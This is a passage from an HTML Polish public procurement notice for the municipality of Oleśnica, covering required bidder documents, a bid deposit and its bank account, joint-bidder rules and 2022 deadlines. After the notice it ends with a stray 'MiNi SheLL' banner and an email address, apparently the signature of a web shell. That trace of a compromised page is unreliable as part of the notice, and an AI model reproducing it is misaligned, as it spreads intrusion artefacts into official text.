mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty – według załącznika nr 4 do SWZ;<br/>c)	Wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami ¬– według załącznika nr 5 do SWZ;</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) Pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik; 2)<br/>Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia - dotyczy ofert składanych przez Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia;3) Oświadczenie Wykonawcy o<br/>niepodleganiu wykluczeniu z postępowania oraz spełnianiu warunków udziału w postępowaniu –<br/>wzór oświadczenia o niepodleganiu wykluczeniu i spełnianiu warunków stanowi Załącznik nr 3<br/>do SWZ. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców,<br/>oświadczenie o niepodleganiu wykluczeniu składa każdy z Wykonawców.;4) Następujące<br/>podmiotowe i przedmiotowe środki dowodowe: zgodnie z rozdz. XIV SWZ i ogłoszeniem 5)<br/>Dokument wadium, 6) Zobowiązanie podmiotu(ów) trzeciego(ich) – jeśli dotyczy<br/>7) inne dokumenty wymagane w SWZ - jeśli dotyczy, 8) formularz ofertowy <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca zobowiązany jest wnieść wadium w wysokości 100 000,00 PLN (sto tysięcy), w formie zgodnej z art. 97 ust. 7 ustawy, tj.:<br/>1)	w pieniądzu;<br/>2)	w gwarancjach bankowych;<br/>3)	w gwarancjach ubezpieczeniowych;<br/>4)	w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości. <br/>2.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego w Banku Spółdzielczym w Oleśnicy nr 18 9584 0008 2001 0000 0055 0004 wpisując tytuł przelewu: wadium i numer (sygnaturę) postępowania <br/>3.	Zaleca się dołączenie do oferty dokumentu potwierdzającego dokonanie przelewu.<br/>4.	Wadium winno być na koncie Zamawiającego nie później niż przed upływem terminu składania ofert.<br/>5.	Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym przez gwaranta. Wadium wniesione w formie gwarancji i poręczeń musi spełniać co najmniej poniższe warunki:<br/>1)	musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę, określone w art. 98 ust.6 ustawy Pzp;<br/>2)	z jego treści powinno jednoznacznie wynikać zobowiązanie gwaranta;<br/>3)	powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie;<br/>4)	musi obejmować cały okres związania ofertą, począwszy od dnia, w którym upływa termin składania ofert;<br/>5)	nie może zawierać postanowień uzależniających jego dalsze obowiązywanie od zwrotu oryginału dokumentu gwarancyjnego do Gwaranta;<br/>6)	w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego postępowania;<br/>7)	Beneficjentem poręczenia lub gwarancji jest Gmina Miasto Oleśnica <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i<br/>zawarcia umowy w sprawie zamówienia publicznego. W przypadku Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia,<br/>Oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp składa każdy z Wykonawców. Oświadczenia te potwierdzają<br/>brak podstaw wykluczenia oraz spełnianie warunków udziału<br/>w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków<br/>udziału w postępowaniu. Oświadczenia i dokumenty potwierdzające brak podstaw wykluczenia z<br/>postępowania, w tym oświadczenie dotyczące przynależności lub braku przynależności do tej samej grupy kapitałowej,<br/>składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>W przypadku wyboru oferty Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>a) Zamawiający, zgodnie z art. 59 ustawy Pzp, żąda kopii umowy regulującej współpracę tych Wykonawców przed<br/>zawarciem umowy, b) Wykonawcy ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia<br/>należytego wykonania umowy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Wskazano we wzorze umowy - załącznik do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-12-05 10:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/, skrzynka ePUAP: /idumolesnica/SkrytkaESP</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-12-05 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-01-03</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com